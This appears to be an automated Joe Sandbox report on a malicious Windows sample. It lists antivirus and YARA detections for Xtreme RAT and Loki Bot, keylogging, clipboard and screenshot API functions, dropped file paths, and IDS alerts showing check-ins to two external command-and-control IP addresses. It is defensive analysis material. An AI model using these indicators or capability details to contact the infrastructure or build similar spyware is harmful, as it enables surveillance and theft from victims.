
Analysis Report

Overview

General Information

Joe Sandbox Version: 22.0.0
Analysis ID: 546427
Start time: 10:09:44
Joe Sandbox Product: Cloud
Start date: 03.05.2018
Overall analysis duration: 0h 15m 51s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: sxz.exe
Cookbook file name: default.jbs
Analysis system description: Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.evad.expl.spyw.troj.winEXE@61/225@34/1
HCA Information: Failed
EGA Information:
  • Successful, ratio: 71.4%
HDC Information:
  • Successful, ratio: 66.1% (good quality ratio 64.6%)
  • Quality average: 82.3%
  • Quality standard deviation: 25.4%
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): conhost.exe, WMIADAP.exe, dllhost.exe
  • Execution Graph export aborted for target explorer.exe, PID 3960 because there are no executed functions
  • Report creation exceeded maximum time and may have missing behavior and disassembly information.
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtEnumerateKey calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
  • Report size getting too big, too many NtReadFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: sxz.exe, javaw.exe, java.exe

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Analysis Advice:
  • Contains functionality to modify the execution of threads in other processes
  • Sample drops PE files which have not been started; submit the dropped PE samples to Joe Sandbox for a secondary analysis
  • Sample has a GUI, but Joe Sandbox has not found any clickable buttons; more UI automation is likely to extend the observed behavior
  • Sample has functionality to log and monitor keystrokes; analyze it with the 'Simulates keyboard and window changes' cookbook
  • Sample monitors Window changes (e.g. starting applications); analyze the sample with the 'Simulates keyboard and window changes' cookbook



Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user~1\AppData\Local\Temp\358saxio.exe | Avira: Label: DR/Delphi.svunx
Source: C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs | Avira: Label: VBS/Agent.281
Source: C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs | Avira: Label: VBS/Agent.276
Source: C:\Users\user\AppData\Roaming\Microsoft\Skype.exe | Avira: Label: DR/Delphi.svunx
Source: C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbs | Avira: Label: VBS/Agent.281
Source: C:\Users\user~1\AppData\Local\Temp\server.exe | Avira: Label: TR/Spy.59904216
Source: C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs | Avira: Label: VBS/Agent.276

Antivirus detection for submitted file
Source: sxz.exe | Avira: Label: DR/Delphi.wqtni

Multi AV Scanner detection for dropped file
Source: C:\Users\user~1\AppData\Local\Temp\358saxio.exe | virustotal: Detection: 48%

Multi AV Scanner detection for submitted file
Source: sxz.exe | virustotal: Detection: 43%

Antivirus detection for unpacked file
Source: 19.1.358saxio.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 12.0.358saxio.exe.400000.3.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 27.1.Server.exe.c80000.0.unpack | Avira: Label: TR/Spy.59904216
Source: 5.2.svchost.exe.c80000.6.unpack | Avira: Label: TR/Spy.59904216
Source: 3.2.server.exe.c80000.1.unpack | Avira: Label: TR/Spy.59904216
Source: 15.0.Server.exe.c80000.0.unpack | Avira: Label: TR/Spy.59904216
Source: 2.1.sxz.exe.400000.0.unpack | Avira: Label: DR/Injector.toian
Source: 35.2.358saxio.exe.400000.2.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 27.2.Server.exe.c80000.1.unpack | Avira: Label: TR/Spy.59904216
Source: 15.0.Server.exe.c80000.1.unpack | Avira: Label: TR/Spy.59904216
Source: 19.0.358saxio.exe.400000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.server.exe.c80000.2.unpack | Avira: Label: TR/Spy.59904216
Source: 35.0.358saxio.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 6.2.iexplore.exe.c80000.2.unpack | Avira: Label: TR/Spy.59904216
Source: 35.1.358saxio.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 19.0.358saxio.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.iexplore.exe.c80000.0.unpack | Avira: Label: TR/Spy.59904216
Source: 12.2.358saxio.exe.23c0000.3.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 2.0.sxz.exe.400000.1.unpack | Avira: Label: DR/Injector.toian
Source: 19.2.358saxio.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 14.1.explorer.exe.1b80000.0.unpack | Avira: Label: TR/Spy.59904216
Source: 1.2.sxz.exe.1a40000.3.unpack | Avira: Label: DR/Injector.toian
Source: 35.2.358saxio.exe.1440000.3.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 3.0.server.exe.c80000.0.unpack | Avira: Label: TR/Spy.59904216
Source: 15.1.Server.exe.c80000.0.unpack | Avira: Label: TR/Spy.59904216
Source: 1.0.sxz.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 14.1.explorer.exe.1b80000.1.unpack | Avira: Label: TR/Spy.59904216
Source: 35.0.358saxio.exe.400000.1.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 27.0.Server.exe.c80000.1.unpack | Avira: Label: TR/Spy.59904216
Source: 5.0.svchost.exe.c80000.0.unpack | Avira: Label: TR/Spy.59904216
Source: 27.0.Server.exe.c80000.0.unpack | Avira: Label: TR/Spy.59904216
Source: 15.0.Server.exe.c80000.2.unpack | Avira: Label: TR/Spy.59904216
Source: 2.2.sxz.exe.400000.2.unpack | Avira: Label: DR/Injector.toian
Source: 19.0.358saxio.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 15.2.Server.exe.c80000.1.unpack | Avira: Label: TR/Spy.59904216
Source: 12.2.358saxio.exe.400000.2.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 12.0.358saxio.exe.400000.2.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 2.0.sxz.exe.400000.3.unpack | Avira: Label: DR/Injector.toian
Source: 2.0.sxz.exe.400000.2.unpack | Avira: Label: DR/Injector.toian
Source: 34.0.iexplore.exe.c80000.0.unpack | Avira: Label: TR/Spy.59904216
Source: 15.0.Server.exe.c80000.3.unpack | Avira: Label: TR/Spy.59904216
Source: 3.0.server.exe.c80000.3.unpack | Avira: Label: TR/Spy.59904216
Source: 34.2.iexplore.exe.c80000.2.unpack | Avira: Label: TR/Spy.59904216
Source: 27.0.Server.exe.c80000.3.unpack | Avira: Label: TR/Spy.59904216
Source: 3.0.server.exe.c80000.1.unpack | Avira: Label: TR/Spy.59904216
Source: 2.0.sxz.exe.400000.5.unpack | Avira: Label: DR/Injector.toian
Source: 5.2.svchost.exe.290000.1.unpack | Avira: Label: TR/Spy.59904216
Source: 1.2.sxz.exe.400000.2.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 12.0.358saxio.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 27.0.Server.exe.c80000.2.unpack | Avira: Label: TR/Spy.59904216
Source: 12.0.358saxio.exe.400000.1.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 3.1.server.exe.c80000.0.unpack | Avira: Label: TR/Spy.59904216
Source: 35.0.358saxio.exe.400000.2.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 2.0.sxz.exe.400000.4.unpack | Avira: Label: DR/Injector.toian
Source: 19.0.358saxio.exe.400000.3.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 35.0.358saxio.exe.400000.3.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 19.0.358saxio.exe.400000.1.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 2.0.sxz.exe.400000.0.unpack | Avira: Label: DR/Injector.toian
Source: 1.1.sxz.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 19.0.358saxio.exe.400000.2.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 12.1.358saxio.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Yara signature match

Matched rules:
  • RAT_Xtreme: author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
  • Xtreme_Sep17_1: author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6

Sources:
Source: 00000003.00000000.14905165956.00C81000.00000020.sdmp, type: MEMORY | Matched rules: RAT_Xtreme
Source: 0000000F.00000000.14937698570.00C81000.00000020.sdmp, type: MEMORY | Matched rules: RAT_Xtreme
Source: 0000000F.00000002.14989895202.00C81000.00000020.sdmp, type: MEMORY | Matched rules: RAT_Xtreme
Source: 0000001B.00000000.15000788791.00C81000.00000020.sdmp, type: MEMORY | Matched rules: RAT_Xtreme
Source: 0000000F.00000000.14932929795.00C81000.00000020.sdmp, type: MEMORY | Matched rules: RAT_Xtreme
Source: 00000022.00000000.15012281235.00C80000.00000040.sdmp, type: MEMORY | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 00000003.00000001.14905808954.00C81000.00000020.sdmp, type: MEMORY | Matched rules: RAT_Xtreme
Source: 0000000E.00000001.14937243423.01B81000.00000020.sdmp, type: MEMORY | Matched rules: RAT_Xtreme
Source: 00000003.00000002.14987723130.00C81000.00000020.sdmp, type: MEMORY | Matched rules: RAT_Xtreme
Source: 0000001B.00000001.15007151931.00C81000.00000020.sdmp, type: MEMORY | Matched rules: RAT_Xtreme
Source: 0000001B.00000000.15001441864.00C81000.00000020.sdmp, type: MEMORY | Matched rules: RAT_Xtreme
Source: 00000005.00000002.15179880413.00C80000.00000040.sdmp, type: MEMORY | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 0000001B.00000000.14999659592.00C81000.00000020.sdmp, type: MEMORY | Matched rules: RAT_Xtreme
Source: 00000006.00000002.14955870384.00C80000.00000040.sdmp, type: MEMORY | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 0000000F.00000000.14944848932.00C81000.00000020.sdmp, type: MEMORY | Matched rules: RAT_Xtreme
Source: 00000005.00000002.15177862719.00290000.00000004.sdmp, type: MEMORY | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 0000000F.00000000.14950318636.00C81000.00000020.sdmp, type: MEMORY | Matched rules: RAT_Xtreme
Source: 0000000F.00000001.14957378618.00C81000.00000020.sdmp, type: MEMORY | Matched rules: RAT_Xtreme
Source: 00000006.00000000.14913253676.00C80000.00000040.sdmp, type: MEMORY | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 00000003.00000000.14904035142.00C81000.00000020.sdmp, type: MEMORY | Matched rules: RAT_Xtreme
Source: 0000000E.00000001.14936774837.01B81000.00000020.sdmp, type: MEMORY | Matched rules: RAT_Xtreme
Source: 0000001B.00000002.15035469105.00C81000.00000020.sdmp, type: MEMORY | Matched rules: RAT_Xtreme
Source: 00000003.00000000.14905430148.00C81000.00000020.sdmp, type: MEMORY | Matched rules: RAT_Xtreme
Source: 00000003.00000000.14904944731.00C81000.00000020.sdmp, type: MEMORY | Matched rules: RAT_Xtreme
Source: 00000005.00000000.14909911900.00C80000.00000040.sdmp, type: MEMORY | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 0000001B.00000000.15004091676.00C81000.00000020.sdmp, type: MEMORY | Matched rules: RAT_Xtreme
Source: 00000022.00000002.15021754459.00C80000.00000040.sdmp, type: MEMORY | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: C:\Windows\InstallDir\Server.exe, type: DROPPED | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: C:\Users\user~1\AppData\Local\Temp\server.exe, type: DROPPED | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 34.0.iexplore.exe.c80000.0.raw.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 27.1.Server.exe.c80000.0.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 3.2.server.exe.c80000.1.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 15.0.Server.exe.c80000.0.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 5.2.svchost.exe.c80000.6.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 15.0.Server.exe.c80000.1.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 3.0.server.exe.c80000.2.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 6.0.iexplore.exe.c80000.0.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 27.2.Server.exe.c80000.1.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 6.2.iexplore.exe.c80000.2.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 5.2.svchost.exe.c80000.6.raw.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 14.1.explorer.exe.1b80000.0.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 3.0.server.exe.c80000.0.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 15.1.Server.exe.c80000.0.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 34.2.iexplore.exe.c80000.2.raw.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 14.1.explorer.exe.1b80000.1.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 5.0.svchost.exe.c80000.0.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 27.0.Server.exe.c80000.1.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 27.0.Server.exe.c80000.0.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 15.0.Server.exe.c80000.2.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 6.2.iexplore.exe.c80000.2.raw.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 15.2.Server.exe.c80000.1.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1, RAT_Xtreme
Source: 34.0.iexplore.exe.c80000.0.unpack, type: UNPACKEDPE | Matched rules: Xtreme_Sep17_1
Source: 34.0.iexplore.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 15.0.Server.exe.c80000.3.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 15.0.Server.exe.c80000.3.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 5.0.svchost.exe.c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 5.0.svchost.exe.c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 27.0.Server.exe.c80000.3.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 27.0.Server.exe.c80000.3.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 3.0.server.exe.c80000.3.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 3.0.server.exe.c80000.3.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 34.2.iexplore.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 34.2.iexplore.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 3.0.server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 3.0.server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 5.2.svchost.exe.290000.1.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 5.2.svchost.exe.290000.1.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 27.0.Server.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 27.0.Server.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 3.1.server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 3.1.server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 5.2.svchost.exe.290000.1.raw.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 5.2.svchost.exe.290000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 6.0.iexplore.exe.c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 6.0.iexplore.exe.c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to register a low level keyboard hook
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C86946 SetWindowsHookExW 0000000D,Function_00006748,00000000,00000000 | 3_2_00C86946
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C8389C OpenClipboard,GetClipboardData,GlobalFix,GlobalSize,GlobalUnWire,CloseClipboard | 3_2_00C8389C
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C8389C OpenClipboard,GetClipboardData,GlobalFix,GlobalSize,GlobalUnWire,CloseClipboard | 3_2_00C8389C
Contains functionality to record screenshots
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 12_2_004254C8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette | 12_2_004254C8
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\server.exe | Code function: 3_2_00C86748 GetKeyboardState,GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,VirtualAlloc,SendMessageA,CallNextHookEx | 3_2_00C86748

Software Vulnerabilities:

Exploit detected, runtime environment starts unknown processes
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe | Process created: C:\Windows\System32\cmd.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h] | 12_2_00481C0C
Source: C:\Users\user\AppData\Local\Temp\358saxio.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h] | 12_2_00481FD4

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49188 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49189 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49190 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49191 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49192 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49193 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49194 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49196 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49199 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49205 -> 185.208.211.131:2379
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49211 -> 185.208.211.131:2379
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49216 -> 185.208.211.131:2379
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49220 -> 185.208.211.131:2379
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49221 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49224 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49225 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49226 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49228 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49230 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49231 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49233 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49234 -> 185.208.211.131:2379
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49235 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49236 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49239 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49240 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49242 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49243 -> 103.48.119.225:80
Source: Traffic | Snort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49245 -> 185.208.211.131:2379
Source: Traffic | Snort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49246 -> 103.48.119.225:80
